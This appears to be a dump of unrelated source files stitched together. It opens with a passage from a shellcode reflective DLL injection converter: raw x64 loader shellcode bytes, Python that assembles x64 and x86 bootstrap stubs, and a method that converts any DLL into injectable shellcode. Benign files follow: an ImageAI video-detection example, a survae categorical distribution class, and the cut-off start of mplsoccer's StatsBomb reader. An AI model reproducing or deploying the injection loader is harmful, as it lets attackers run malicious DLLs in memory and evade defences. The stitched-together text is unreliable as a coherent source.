b'\x24\x50\x6C\x6C\x6F\x63\xC7\x44\x24\x68\x56\x69\x72\x74\xC7\x44\x24\x6C\x75\x61\x6C\x50' \
b'\xC7\x44\x24\x70\x72\x6F\x74\x65\x66\xC7\x44\x24\x74\x63\x74\xC7\x45\xA8\x46\x6C\x75\x73' \
b'\xC7\x45\xAC\x68\x49\x6E\x73\xC7\x45\xB0\x74\x72\x75\x63\xC7\x45\xB4\x74\x69\x6F\x6E\xC7' \
b'\x45\xB8\x43\x61\x63\x68\xC7\x44\x24\x78\x47\x65\x74\x4E\xC7\x44\x24\x7C\x61\x74\x69\x76' \
b'\xC7\x45\x80\x65\x53\x79\x73\xC7\x45\x84\x74\x65\x6D\x49\x66\xC7\x45\x88\x6E\x66\xC6\x45' \
b'\x8A\x6F\xC7\x45\x90\x52\x74\x6C\x41\xC7\x45\x94\x64\x64\x46\x75\xC7\x45\x98\x6E\x63\x74' \
b'\x69\xC7\x45\x9C\x6F\x6E\x54\x61\x66\xC7\x45\xA0\x62\x6C\xE8\x7F\x08\x00\x00\xB9\xB5\x41' \
b'\xD9\x5E\x48\x8B\xD8\xE8\x72\x08\x00\x00\x4C\x8B\xE8\x48\x89\x45\xD0\x48\x8D\x45\xD8\xC7' \
b'\x45\x20\x18\x00\x18\x00\x4C\x8D\x4C\x24\x38\x48\x89\x45\x28\x4C\x8D\x45\x20\x33\xD2\x33' \
b'\xC9\xFF\xD3\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x48\x45\x33\xC0\x48\x89\x44\x24\x30\x4C' \
b'\x8D\x4D\xC8\xC7\x44\x24\x28\x0C\x00\x0C\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C' \
b'\x24\x38\x48\x8D\x44\x24\x68\x45\x33\xC0\x48\x89\x44\x24\x30\x4C\x8D\x4D\x00\xC7\x44\x24' \
b'\x28\x0E\x00\x0E\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8D\x45\xA8\xC7\x44\x24\x28\x15' \
b'\x00\x15\x00\x48\x8B\x4C\x24\x38\x4C\x8D\x4D\x08\x45\x33\xC0\x48\x89\x44\x24\x30\x48\x8D' \
b'\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x78\x45\x33\xC0\x48\x89\x44' \
b'\x24\x30\x4C\x8D\x4D\x10\xC7\x44\x24\x28\x13\x00\x13\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5' \
b'\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x40\x45\x33\xC0\x48\x89\x44\x24\x30\x4C\x8D\x4D\xF0' \
b'\xC7\x44\x24\x28\x05\x00\x05\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C\x24\x38\x48' \
b'\x8D\x45\x90\x45\x33\xC0\x48\x89\x44\x24\x30\x4C\x8D\x4D\x18\xC7\x44\x24\x28\x13\x00\x13' \
b'\x00\x48\x8D\x54\x24\x28\x41\xFF\xD5\x48\x8B\x4C\x24\x38\x48\x8D\x44\x24\x58\x45\x33\xC0' \
b'\x48\x89\x44\x24\x30\x4C\x8D\x4D\xF8\xC7\x44\x24\x28\x0C\x00\x0C\x00\x48\x8D\x54\x24\x28' \
b'\x41\xFF\xD5\x4C\x39\x7D\xC8\x0F\x84\x1D\x07\x00\x00\x4C\x39\x7D\x00\x0F\x84\x13\x07\x00' \
b'\x00\x4C\x39\x7D\xF0\x0F\x84\x09\x07\x00\x00\x4C\x39\x7D\x08\x0F\x84\xFF\x06\x00\x00\x48' \
b'\x8B\x55\x10\x48\x85\xD2\x0F\x84\xF2\x06\x00\x00\x48\x63\x7E\x3C\x48\x03\xFE\x81\x3F\x50' \
b'\x45\x00\x00\x0F\x85\xDF\x06\x00\x00\xB8\x64\x86\x00\x00\x66\x39\x47\x04\x0F\x85\xD0\x06' \
b'\x00\x00\x45\x8D\x4F\x01\x44\x84\x4F\x38\x0F\x85\xC2\x06\x00\x00\x0F\xB7\x4F\x14\x41\x8B' \
b'\xDF\x48\x83\xC1\x24\x66\x44\x3B\x7F\x06\x73\x25\x44\x0F\xB7\x47\x06\x48\x03\xCF\x44\x39' \
b'\x79\x04\x8B\x47\x38\x0F\x45\x41\x04\x03\x01\x48\x8D\x49\x28\x3B\xC3\x0F\x46\xC3\x8B\xD8' \
b'\x4D\x2B\xC1\x75\xE3\x48\x8D\x4D\x38\xFF\xD2\x8B\x55\x3C\x44\x8B\xC2\x44\x8D\x72\xFF\xF7' \
b'\xDA\x44\x03\x77\x50\x49\x8D\x48\xFF\x8B\xC2\x4C\x23\xF0\x8B\xC3\x48\x03\xC8\x49\x8D\x40' \
b'\xFF\x48\xF7\xD0\x48\x23\xC8\x4C\x3B\xF1\x0F\x85\x54\x06\x00\x00\x48\x8B\x4F\x30\x41\xBC' \
b'\x00\x30\x00\x00\x45\x8B\xC4\x41\xB9\x04\x00\x00\x00\x49\x8B\xD6\xFF\x55\xC8\x48\x8B\xD8' \
b'\x48\x85\xC0\x75\x12\x44\x8D\x48\x04\x45\x8B\xC4\x49\x8B\xD6\x33\xC9\xFF\x55\xC8\x48\x8B' \
b'\xD8\x44\x8B\xA5\xD0\x00\x00\x00\x41\xBB\x01\x00\x00\x00\x45\x84\xE3\x74\x1D\x8B\x46\x3C' \
b'\x89\x43\x3C\x8B\x56\x3C\xEB\x0B\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88\x04\x19\x3B\x57\x54' \
b'\x72\xF0\xEB\x19\x41\x8B\xD7\x44\x39\x7F\x54\x76\x10\x8B\xCA\x41\x03\xD3\x8A\x04\x31\x88' \
b'\x04\x19\x3B\x57\x54\x72\xF0\x48\x63\x7B\x3C\x45\x8B\xD7\x48\x03\xFB\x48\x89\x7D\x30\x44' \
b'\x0F\xB7\x47\x14\x49\x83\xC0\x28\x66\x44\x3B\x7F\x06\x73\x3A\x4C\x03\xC7\x45\x8B\xCF\x45' \
b'\x39\x38\x76\x1F\x41\x8B\x50\x04\x41\x8B\x48\xFC\x41\x8B\xC1\x45\x03\xCB\x48\x03\xC8\x48' \
b'\x03\xD0\x8A\x04\x32\x88\x04\x19\x45\x3B\x08\x72\xE1\x0F\xB7\x47\x06\x45\x03\xD3\x49\x83' \
b'\xC0\x28\x44\x3B\xD0\x72\xC9\x4C\x8B\xF3\x41\xB8\x02\x00\x00\x00\x4C\x2B\x77\x30\x0F\x84' \
b'\xD6\x00\x00\x00\x44\x39\xBF\xB4\x00\x00\x00\x0F\x84\xC9\x00\x00\x00\x44\x8B\x8F\xB0\x00' \
b'\x00\x00\x4C\x03\xCB\x45\x39\x39\x0F\x84\xB6\x00\x00\x00\x4D\x8D\x51\x08\xE9\x91\x00\x00' \
b'\x00\x45\x0F\xB7\x1A\x41\x0F\xB7\xCB\x41\x0F\xB7\xC3\x66\xC1\xE9\x0C\x66\x83\xF9\x0A\x75' \
b'\x29\x45\x8B\x01\x41\x81\xE3\xFF\x0F\x00\x00\x4B\x8D\x04\x18\x48\x8B\x14\x18\x4B\x8D\x04' \
b'\x18\x41\xBB\x01\x00\x00\x00\x49\x03\xD6\x48\x89\x14\x18\x45\x8D\x43\x01\xEB\x4F\x41\xBB' \
b'\x01\x00\x00\x00\x66\x83\xF9\x03\x75\x0E\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x41\x8B\xC6' \
b'\xEB\x2E\x66\x41\x3B\xCB\x75\x15\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03\x49\x8B\xC6\x48\xC1' \
b'\xE8\x10\x0F\xB7\xC0\xEB\x13\x66\x41\x3B\xC8\x75\x14\x25\xFF\x0F\x00\x00\x48\x8D\x0C\x03' \
b'\x41\x0F\xB7\xC6\x41\x8B\x11\x48\x01\x04\x0A\x4D\x03\xD0\x41\x8B\x41\x04\x49\x03\xC1\x4C' \
b'\x3B\xD0\x0F\x85\x5F\xFF\xFF\xFF\x4D\x8B\xCA\x45\x39\x3A\x0F\x85\x4A\xFF\xFF\xFF\x44\x39' \
b'\xBF\x94\x00\x00\x00\x0F\x84\x82\x01\x00\x00\x8B\x8F\x90\x00\x00\x00\x45\x8B\xEF\x4C\x8D' \
b'\x04\x19\x49\x8D\x40\x0C\xEB\x07\x45\x03\xEB\x48\x8D\x40\x14\x44\x39\x38\x75\xF4\x41\x8B' \
b'\xC4\x83\xE0\x04\x89\x45\xC0\x8B\xC1\x0F\x84\x89\x00\x00\x00\x45\x3B\xEB\x0F\x86\x80\x00' \
b'\x00\x00\x41\xC1\xEC\x10\x45\x8D\x5D\xFF\x45\x8B\xD7\x45\x85\xDB\x74\x74\x4D\x8B\xC8\x41' \
b'\xBE\xFF\x7F\x00\x00\x41\x0F\x10\x01\x33\xD2\x41\x8B\xCD\x41\x2B\xCA\x69\xF6\xFD\x43\x03' \
b'\x00\x41\x8B\xC6\xF7\xF1\x33\xD2\x81\xC6\xC3\x9E\x26\x00\x8D\x48\x01\x8B\xC6\xC1\xE8\x10' \
b'\x41\x23\xC6\xF7\xF1\x41\x03\xC2\x41\xFF\xC2\x48\x8D\x0C\x80\x41\x8B\x54\x88\x10\x41\x0F' \
b'\x10\x0C\x88\x41\x0F\x11\x04\x88\x41\x8B\x41\x10\x41\x89\x44\x88\x10\x41\x0F\x11\x09\x41' \
b'\x89\x51\x10\x4D\x8D\x49\x14\x45\x3B\xD3\x72\xA1\x8B\x87\x90\x00\x00\x00\xEB\x04\x44\x8B' \
b'\x65\xC0\x8B\xF0\x48\x03\xF3\x8B\x46\x0C\x85\xC0\x0F\x84\xB1\x00\x00\x00\x8B\x7D\xC0\x8B' \
b'\xC8\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x4C\x8B\xD0\x44\x8B\x36\x44\x8B\x7E\x10' \
b'\x4C\x03\xF3\x4C\x03\xFB\x49\x8B\x0E\x48\x85\xC9\x74\x5F\x48\x85\xC9\x79\x08\x45\x0F\xB7' \
b'\x06\x33\xD2\xEB\x32\x48\x8D\x53\x02\x33\xC0\x48\x03\xD1\x38\x02\x74\x0E\x48\x8B\xCA\x48' \
b'\xFF\xC1\x48\xFF\xC0\x80\x39\x00\x75\xF5\x48\x89\x54\x24\x30\x45\x33\xC0\x48\x8D\x54\x24' \
b'\x28\x66\x89\x44\x24\x28\x66\x89\x44\x24\x2A\x4D\x8B\xCF\x49\x8B\xCA\xFF\x55\xD0\x49\x83' \
b'\xC6\x08\x49\x83\xC7\x08\x49\x8B\x0E\x48\x85\xC9\x74\x07\x4C\x8B\x54\x24\x38\xEB\xA1\x45' \
b'\x33\xFF\x85\xFF\x74\x10\x41\x83\xFD\x01\x76\x0A\x41\x69\xCC\xE8\x03\x00\x00\xFF\x55\xF0' \
b'\x8B\x46\x20\x48\x83\xC6\x14\x85\xC0\x0F\x85\x56\xFF\xFF\xFF\x48\x8B\x7D\x30\x4C\x8B\x6D' \
b'\xD0\x44\x39\xBF\xF4\x00\x00\x00\x0F\x84\xA9\x00\x00\x00\x44\x8B\xBF\xF0\x00\x00\x00\x49' \
b'\x83\xC7\x04\x4C\x03\xFB\x45\x33\xE4\x41\x8B\x07\x85\xC0\x0F\x84\x8A\x00\x00\x00\x8B\xC8' \
b'\x48\x03\xCB\xFF\x55\xF8\x48\x89\x44\x24\x38\x48\x8B\xC8\x41\x8B\x77\x08\x45\x8B\x77\x0C' \
b'\x48\x03\xF3\x4C\x03\xF3\x4C\x39\x26\x74\x5E\x49\x8B\x16\x48\x85\xD2\x79\x08\x44\x0F\xB7' \
b'\xC2\x33\xD2\xEB\x34\x4C\x8D\x43\x02\x49\x8B\xC4\x4C\x03\xC2\x45\x38\x20\x74\x0E\x49\x8B' \
b'\xD0\x48\xFF\xC2\x48\xFF\xC0\x44\x38\x22\x75\xF5\x4C\x89\x44\x24\x30\x48\x8D\x54\x24\x28' \
b'\x45\x33\xC0\x66\x89\x44\x24\x28\x66\x89\x44\x24\x2A\x4C\x8B\xCE\x41\xFF\xD5\x48\x83\xC6' \
b'\x08\x49\x83\xC6\x08\x4C\x39\x26\x74\x07\x48\x8B\x4C\x24\x38\xEB\xA2\x49\x83\xC7\x20\xE9' \
b'\x6B\xFF\xFF\xFF\x45\x33\xFF\x0F\xB7\x77\x14\x45\x8B\xF7\x48\x83\xC6\x28\x41\xBC\x01\x00' \
b'\x00\x00\x66\x44\x3B\x7F\x06\x0F\x83\x0B\x01\x00\x00\x48\x03\xF7\x44\x39\x3E\x0F\x84\xEB' \
b'\x00\x00\x00\x8B\x46\x14\x8B\xC8\x81\xE1\x00\x00\x00\x20\x75\x17\x0F\xBA\xE0\x1E\x72\x11' \
b'\x85\xC0\x78\x0D\x45\x8B\xC4\x44\x89\x64\x24\x20\xE9\xA4\x00\x00\x00\x85\xC9\x75\x3C\x0F' \
b'\xBA\xE0\x1E\x72\x0A\x85\xC0\x79\x06\x44\x8D\x41\x08\xEB\x68\x85\xC9\x75\x28\x0F\xBA\xE0' \
b'\x1E\x73\x0A\x85\xC0\x78\x06\x44\x8D\x41\x02\xEB\x54\x85\xC9\x75\x14\x0F\xBA\xE0\x1E\x73' \
b'\x0A\x85\xC0\x79\x06\x44\x8D\x41\x04\xEB\x40\x85\xC9\x74\x5F\x0F\xBA\xE0\x1E\x72\x0C\x85' \
b'\xC0\x78\x08\x41\xB8\x10\x00\x00\x00\xEB\x2A\x85\xC9\x74\x49\x0F\xBA\xE0\x1E\x72\x0C\x85' \
b'\xC0\x79\x08\x41\xB8\x80\x00\x00\x00\xEB\x14\x85\xC9\x74\x33\x0F\xBA\xE0\x1E\x73\x11\x85' \
b'\xC0\x78\x0D\x41\xB8\x20\x00\x00\x00\x44\x89\x44\x24\x20\xEB\x21\x85\xC9\x74\x18\x0F\xBA' \
b'\xE0\x1E\x73\x12\x44\x8B\x44\x24\x20\x85\xC0\xB9\x40\x00\x00\x00\x44\x0F\x48\xC1\xEB\xDD' \
b'\x44\x8B\x44\x24\x20\xF7\x46\x14\x00\x00\x00\x04\x74\x0A\x41\x0F\xBA\xE8\x09\x44\x89\x44' \
b'\x24\x20\x8B\x4E\xFC\x4C\x8D\x4C\x24\x20\x8B\x16\x48\x03\xCB\xFF\x55\x00\x0F\xB7\x47\x06' \
b'\x45\x03\xF4\x48\x83\xC6\x28\x44\x3B\xF0\x0F\x82\xF8\xFE\xFF\xFF\x45\x33\xC0\x33\xD2\x48' \
b'\x83\xC9\xFF\xFF\x55\x08\x44\x39\xBF\xD4\x00\x00\x00\x74\x24\x8B\x87\xD0\x00\x00\x00\x48' \
b'\x8B\x74\x18\x18\xEB\x0F\x45\x33\xC0\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x48\x8D\x76\x08\x48' \
b'\x8B\x06\x48\x85\xC0\x75\xE9\x4C\x8B\x4D\x18\x4D\x85\xC9\x74\x2F\x8B\x87\xA4\x00\x00\x00' \
b'\x85\xC0\x74\x25\x8B\xC8\x4C\x8B\xC3\x48\xB8\xAB\xAA\xAA\xAA\xAA\xAA\xAA\xAA\x48\xF7\xE1' \
b'\x8B\x8F\xA0\x00\x00\x00\x48\xC1\xEA\x03\x48\x03\xCB\x41\x2B\xD4\x41\xFF\xD1\x8B\x47\x28' \
b'\x4D\x8B\xC4\x48\x03\xC3\x41\x8B\xD4\x48\x8B\xCB\xFF\xD0\x8B\xB5\xB8\x00\x00\x00\x85\xF6' \
b'\x0F\x84\x97\x00\x00\x00\x44\x39\xBF\x8C\x00\x00\x00\x0F\x84\x8A\x00\x00\x00\x8B\x8F\x88' \
b'\x00\x00\x00\x48\x03\xCB\x44\x8B\x59\x18\x45\x85\xDB\x74\x78\x44\x39\x79\x14\x74\x72\x44' \
b'\x8B\x49\x20\x41\x8B\xFF\x8B\x51\x24\x4C\x03\xCB\x48\x03\xD3\x45\x85\xDB\x74\x5D\x45\x8B' \
b'\x01\x45\x8B\xD7\x4C\x03\xC3\x74\x52\xEB\x0D\x0F\xBE\xC0\x44\x03\xD0\x41\xC1\xCA\x0D\x4D' \
b'\x03\xC4\x41\x8A\x00\x84\xC0\x75\xEC\x41\x3B\xF2\x75\x05\x48\x85\xD2\x75\x12\x41\x03\xFC' \
b'\x49\x83\xC1\x04\x48\x83\xC2\x02\x41\x3B\xFB\x73\x22\xEB\xC3\x8B\x41\x1C\x0F\xB7\x0A\x48' \
b'\x03\xC3\x8B\x95\xC8\x00\x00\x00\x44\x8B\x04\x88\x48\x8B\x8D\xC0\x00\x00\x00\x4C\x03\xC3' \
b'\x41\xFF\xD0\x48\x8B\xC3\xEB\x02\x33\xC0\x48\x8B\x9C\x24\xB0\x01\x00\x00\x48\x81\xC4\x70' \
b'\x01\x00\x00\x41\x5F\x41\x5E\x41\x5D\x41\x5C\x5F\x5E\x5D\xC3\xCC\x48\x8B\xC4\x48\x89\x58' \
b'\x08\x48\x89\x68\x10\x48\x89\x70\x18\x48\x89\x78\x20\x41\x56\x48\x83\xEC\x10\x65\x48\x8B' \
b'\x04\x25\x60\x00\x00\x00\x8B\xE9\x45\x33\xF6\x48\x8B\x50\x18\x4C\x8B\x4A\x10\x4D\x8B\x41' \
b'\x30\x4D\x85\xC0\x0F\x84\xB3\x00\x00\x00\x41\x0F\x10\x41\x58\x49\x63\x40\x3C\x41\x8B\xD6' \
b'\x4D\x8B\x09\xF3\x0F\x7F\x04\x24\x46\x8B\x9C\x00\x88\x00\x00\x00\x45\x85\xDB\x74\xD2\x48' \
b'\x8B\x04\x24\x48\xC1\xE8\x10\x66\x44\x3B\xF0\x73\x22\x48\x8B\x4C\x24\x08\x44\x0F\xB7\xD0' \
b'\x0F\xBE\x01\xC1\xCA\x0D\x80\x39\x61\x7C\x03\x83\xC2\xE0\x03\xD0\x48\xFF\xC1\x49\x83\xEA' \
b'\x01\x75\xE7\x4F\x8D\x14\x18\x45\x8B\xDE\x41\x8B\x7A\x20\x49\x03\xF8\x45\x39\x72\x18\x76' \
b'\x8E\x8B\x37\x41\x8B\xDE\x49\x03\xF0\x48\x8D\x7F\x04\x0F\xBE\x0E\x48\xFF\xC6\xC1\xCB\x0D' \
b'\x03\xD9\x84\xC9\x75\xF1\x8D\x04\x13\x3B\xC5\x74\x0E\x41\xFF\xC3\x45\x3B\x5A\x18\x72\xD5' \
b'\xE9\x5E\xFF\xFF\xFF\x41\x8B\x42\x24\x43\x8D\x0C\x1B\x49\x03\xC0\x0F\xB7\x14\x01\x41\x8B' \
b'\x4A\x1C\x49\x03\xC8\x8B\x04\x91\x49\x03\xC0\xEB\x02\x33\xC0\x48\x8B\x5C\x24\x20\x48\x8B' \
b'\x6C\x24\x28\x48\x8B\x74\x24\x30\x48\x8B\x7C\x24\x38\x48\x83\xC4\x10\x41\x5E\xC3 '
# MARKER:E
if sRDI.is64BitDLL(dll_bytes):
rdi_shellcode = rdi_shellcode64
bootstrap = b''
bootstrap_size = 64
# call next instruction (Pushes next instruction address to stack)
bootstrap += b'\xe8\x00\x00\x00\x00'
# Set the offset to our DLL from pop result
dll_offset = bootstrap_size - len(bootstrap) + len(rdi_shellcode)
# pop rcx - Capture our current location in memory
bootstrap += b'\x59'
# mov r8, rcx - copy our location in memory to r8 before we start modifying RCX
bootstrap += b'\x49\x89\xc8'
# add rcx, <Offset of the DLL>
bootstrap += b'\x48\x81\xc1'
bootstrap += struct.pack('I', dll_offset)
# mov edx, <Hash of function>
bootstrap += b'\xba'
bootstrap += struct.pack('I', function_hash)
# Setup the location of our user data
# add r8, <Offset of the DLL> + <Length of DLL>
bootstrap += b'\x49\x81\xc0'
user_data_location = dll_offset + len(dll_bytes)
bootstrap += struct.pack('I', user_data_location)
# mov r9d, <Length of User Data>
bootstrap += b'\x41\xb9'
bootstrap += struct.pack('I', len(user_data))
# push rsi - save original value
bootstrap += b'\x56'
# mov rsi, rsp - store our current stack pointer for later
bootstrap += b'\x48\x89\xe6'
# and rsp, 0x0FFFFFFFFFFFFFFF0 - Align the stack to 16 bytes
bootstrap += b'\x48\x83\xe4\xf0'
# sub rsp, 0x30 - Create some breathing room on the stack
bootstrap += b'\x48\x83\xec'
bootstrap += b'\x30' # 32 bytes for shadow space + 8 bytes for last arg + 8 bytes for stack alignment
# mov dword ptr [rsp + 0x20], <Flags> - Push arg 5 just above shadow space
bootstrap += b'\xC7\x44\x24'
bootstrap += b'\x20'
bootstrap += struct.pack('I', flags)
# call - Transfer execution to the RDI
bootstrap += b'\xe8'
bootstrap += struct.pack('b',
bootstrap_size - len(bootstrap) - 4) # Skip over the remainder of instructions
bootstrap += b'\x00\x00\x00'
# mov rsp, rsi - Reset our original stack pointer
bootstrap += b'\x48\x89\xf4'
# pop rsi - Put things back where we left them
bootstrap += b'\x5e'
# ret - return to caller
bootstrap += b'\xc3'
if len(bootstrap) != bootstrap_size:
raise Exception(f"x64 bootstrap length: {len(bootstrap)} != bootstrap_size: {bootstrap_size}")
# Ends up looking like this in memory:
# Bootstrap shellcode
# RDI shellcode
# DLL bytes
# User data
return bootstrap + rdi_shellcode + dll_bytes + user_data
else: # 32 bit
rdi_shellcode = rdi_shellcode32
bootstrap = b''
bootstrap_size = 49
# call next instruction (Pushes next instruction address to stack)
bootstrap += b'\xe8\x00\x00\x00\x00'
# Set the offset to our DLL from pop result
dll_offset = bootstrap_size - len(bootstrap) + len(rdi_shellcode)
# pop eax - Capture our current location in memory
bootstrap += b'\x58'
# push ebp
bootstrap += b'\x55'
# mov ebp, esp
bootstrap += b'\x89\xe5'
# mov edx, eax - copy our location in memory to edx before we start modifying eax
bootstrap += b'\x89\xc2'
# add eax, <Offset to the DLL>
bootstrap += b'\x05'
bootstrap += struct.pack('I', dll_offset)
# add edx, <Offset to the DLL> + <Size of DLL>
bootstrap += b'\x81\xc2'
user_data_location = dll_offset + len(dll_bytes)
bootstrap += struct.pack('I', user_data_location)
# push <Flags>
bootstrap += b'\x68'
bootstrap += struct.pack('I', flags)
# push <Length of User Data>
bootstrap += b'\x68'
bootstrap += struct.pack('I', len(user_data))
# push edx
bootstrap += b'\x52'
# push <hash of function>
bootstrap += b'\x68'
bootstrap += struct.pack('I', function_hash)
# push eax
bootstrap += b'\x50'
# call - Transfer execution to the RDI
bootstrap += b'\xe8'
bootstrap += struct.pack('b',
bootstrap_size - len(bootstrap) - 4) # Skip over the remainder of instructions
bootstrap += b'\x00\x00\x00'
# add esp, 0x14 - remove arguments from stack (cdecl)
bootstrap += b'\x83\xc4\x14'
# leave
bootstrap += b'\xc9'
# ret - return to caller
bootstrap += b'\xc3'
if len(bootstrap) != bootstrap_size:
raise Exception(f"x86 bootstrap length: {len(bootstrap)} != bootstrap_size: {bootstrap_size}")
# Ends up looking like this in memory:
# Bootstrap shellcode
# RDI shellcode
# DLL bytes
# User data
return bootstrap + rdi_shellcode + dll_bytes + user_data
def transform(self, target):
dll = open(target, 'rb').read()
flags = self.flags
converted = sRDI.ConvertToShellcode(dll, sRDI.HashFunctionName(self.function), self.args, flags)
return converted
def set_additional_arguments(self, **kwargs):
if "function" in kwargs['kwargs'].keys():
function = kwargs['kwargs']['function']
if function and function != "":
self.function = function
if "params" in kwargs['kwargs'].keys():
params = kwargs['kwargs']['params']
if params and params != "":
self.args = params
|
examples/custom_detection_video.py
|
vickyvava/ImageAI
| 7,141 |
85187
|
<filename>examples/custom_detection_video.py
from imageai.Detection.Custom import CustomVideoObjectDetection
import os
execution_path = os.getcwd()
video_detector = CustomVideoObjectDetection()
video_detector.setModelTypeAsYOLOv3()
video_detector.setModelPath("hololens-ex-60--loss-2.76.h5") # download via https://github.com/OlafenwaMoses/ImageAI/releases/download/essential-v4/hololens-ex-60--loss-2.76.h5
video_detector.setJsonPath("detection_config.json") # download via https://github.com/OlafenwaMoses/ImageAI/releases/download/essential-v4/detection_config.json
video_detector.loadModel()
video_detector.detectObjectsFromVideo(input_file_path="holo1.mp4",
output_file_path=os.path.join(execution_path, "holo1-detected3"),
frames_per_second=20,
minimum_percentage_probability=40,
log_progress=True)
|
survae/distributions/conditional/categorical.py
|
alisiahkoohi/survae_flows
| 262 |
85192
|
import torch
from torch.distributions import Categorical
from survae.distributions.conditional import ConditionalDistribution
from survae.utils import sum_except_batch
class ConditionalCategorical(ConditionalDistribution):
"""A Categorical distribution with conditional logits."""
def __init__(self, net):
super(ConditionalCategorical, self).__init__()
self.net = net
def cond_dist(self, context):
logits = self.net(context)
return Categorical(logits=logits)
def log_prob(self, x, context):
dist = self.cond_dist(context)
return sum_except_batch(dist.log_prob(x))
def sample(self, context):
dist = self.cond_dist(context)
return dist.sample()
def sample_with_log_prob(self, context):
dist = self.cond_dist(context)
z = dist.sample()
log_prob = dist.log_prob(z)
log_prob = sum_except_batch(log_prob)
return z, log_prob
def logits(self, context):
return self.cond_dist(context).logits
def probs(self, context):
return self.cond_dist(context).probs
def mode(self, context):
return self.cond_dist(context).logits.argmax(-1)
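if __name__ == "__main__":
    # Minimal usage sketch. The toy network, dimensions and batch size below are
    # illustrative assumptions, not part of the library itself.
    net = torch.nn.Linear(4, 10)  # maps a 4-dim context to logits over 10 classes
    dist = ConditionalCategorical(net)
    context = torch.randn(8, 4)   # batch of 8 contexts
    z, log_prob = dist.sample_with_log_prob(context)
    print(z.shape, log_prob.shape)   # torch.Size([8]) torch.Size([8])
    print(dist.mode(context).shape)  # torch.Size([8])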
|
mplsoccer/statsbomb.py
|
ThomasSeidl/mplsoccer
| 157 |
85210
|
""" `mplsoccer.statsbomb` is a python module for loading StatsBomb data. """
# Authors: <NAME>, https://twitter.com/numberstorm
# License: MIT
import os
import warnings
import numpy as np
import pandas as pd
EVENT_SLUG = 'https://raw.githubusercontent.com/statsbomb/open-data/master/data/events'
MATCH_SLUG = 'https://raw.githubusercontent.com/statsbomb/open-data/master/data/matches'
LINEUP_SLUG = 'https://raw.githubusercontent.com/statsbomb/open-data/master/data/lineups'
COMPETITION_URL = ('https://raw.githubusercontent.com/statsbomb/open-data/'
'master/data/competitions.json')
STATSBOMB_WARNING = ('Please be responsible with Statsbomb data. '
'Register your details on https://www.statsbomb.com/resource-centre '
'and read the User Agreement carefully (on the same page).')
def _split_location_cols(df, col, new_cols):
""" Location is stored as a list. split into columns. """
for new_col in new_cols:
df[new_col] = np.nan
if col in df.columns:
mask_not_null = df[col].notnull()
df_not_null = df.loc[mask_not_null, col]
df_new = pd.DataFrame(df_not_null.tolist(), index=df_not_null.index)
new_cols = new_cols[:len(df_new.columns)] # number of columns varies depending on whether the z location is present
df_new.columns = new_cols
df.loc[mask_not_null, new_cols] = df_new
df.drop(col, axis=1, inplace=True)
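# For illustration (toy values, not real StatsBomb data): a 'location' cell
# holding [60.2, 40.1] becomes x=60.2, y=40.1, while z stays NaN when absent:
#   df = pd.DataFrame({'location': [[60.2, 40.1], None]})
#   _split_location_cols(df, 'location', ['x', 'y', 'z'])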
def _list_dictionary_to_df(df, col, value_name, var_name, id_col='id'):
""" Some columns are a list of dictionaries. This turns them into a new dataframe of rows."""
df = df.loc[df[col].notnull(), [id_col, col]]
df.set_index(id_col, inplace=True)
df = df[col].apply(pd.Series).copy()
df.reset_index(inplace=True)
df = df.melt(id_vars=id_col, value_name=value_name, var_name=var_name)
df[var_name] = df[var_name] + 1
df = df[df[value_name].notnull()].copy()
df.reset_index(inplace=True, drop=True)
return df
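# For illustration (toy values): a row whose 'related_events' cell is a list of
# ids becomes one output row per id, numbered from 1 in 'event_related_id':
#   df = pd.DataFrame({'id': ['a'], 'related_events': [['b', 'c']]})
#   _list_dictionary_to_df(df, 'related_events', value_name='related_event',
#                          var_name='event_related_id')
#   # -> two rows: (a, 1, b) and (a, 2, c)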
def _split_dict_col(df, col):
""" Function to split a dictionary column to separate columns."""
# handle missing data by filling with an empty dictionary
df[col] = df[col].apply(lambda x: {} if pd.isna(x) else x)
# split the non-missing data and change the column names
df_temp_cols = pd.json_normalize(df[col]).set_index(df.index)
col_names = df_temp_cols.columns
# note: prefix each new column with the original column name if it doesn't already start with it
col_names = [c.replace('.', '_') if c[:len(col)] == col else
(col+'_'+c).replace('.', '_') for c in col_names]
df[col_names] = df_temp_cols
# drop old column
df.drop(col, axis=1, inplace=True)
return df
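# For illustration (toy values): a dictionary column is flattened into prefixed
# columns, with '.' in nested keys replaced by '_':
#   df = pd.DataFrame({'id': [1], 'type': [{'id': 30, 'name': 'Pass'}]})
#   df = _split_dict_col(df, 'type')
#   # -> columns: id, type_id, type_name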
def _simplify_cols_and_drop(df, col, cols=None):
""" Function to merge similar columns together and drop original columns. """
if cols is None:
cols = df.columns[df.columns.str.contains(col)]
df_melt = df[cols].melt(ignore_index=False).copy()
df_melt = df_melt[df_melt.value.notnull()].copy()
df.loc[df_melt.index, col] = df_melt.value
df.drop(cols, axis=1, errors='ignore', inplace=True)
return df
def read_event(path_or_buf, related_event_df=True, shot_freeze_frame_df=True,
tactics_lineup_df=True, warn=True):
""" Extracts individual event json and loads as a dictionary of up to
four pandas.DataFrame: ``event``, ``related event``, ``shot_freeze_frame``,
and ``tactics_lineup``.
Parameters
----------
path_or_buf : a valid JSON str, path object or file-like object
or a requests.models.Response.
related_event_df : bool, default True
Whether to return a ``related_event`` Dataframe in the returned dictionary.
shot_freeze_frame_df : bool, default True
Whether to return a ``shot_freeze_frame`` in the returned dictionary.
tactics_lineup_df : bool, default True
Whether to return a ``tactics_lineup`` Dataframe in the returned dictionary.
warn : bool, default True
Whether to warn about Statsbomb's data license agreement.
Returns
-------
Dict of up to 4 pandas.DataFrame.
Dict keys: ``event``, ``related_event``, ``shot_freeze_frame``, ``tactics_lineup``.
Examples
--------
>>> from mplsoccer.statsbomb import read_event
>>> import os
>>> PATH_TO_EDIT = os.path.join('open-data','data','events','7430.json')
>>> dict_dfs = read_event(PATH_TO_EDIT)
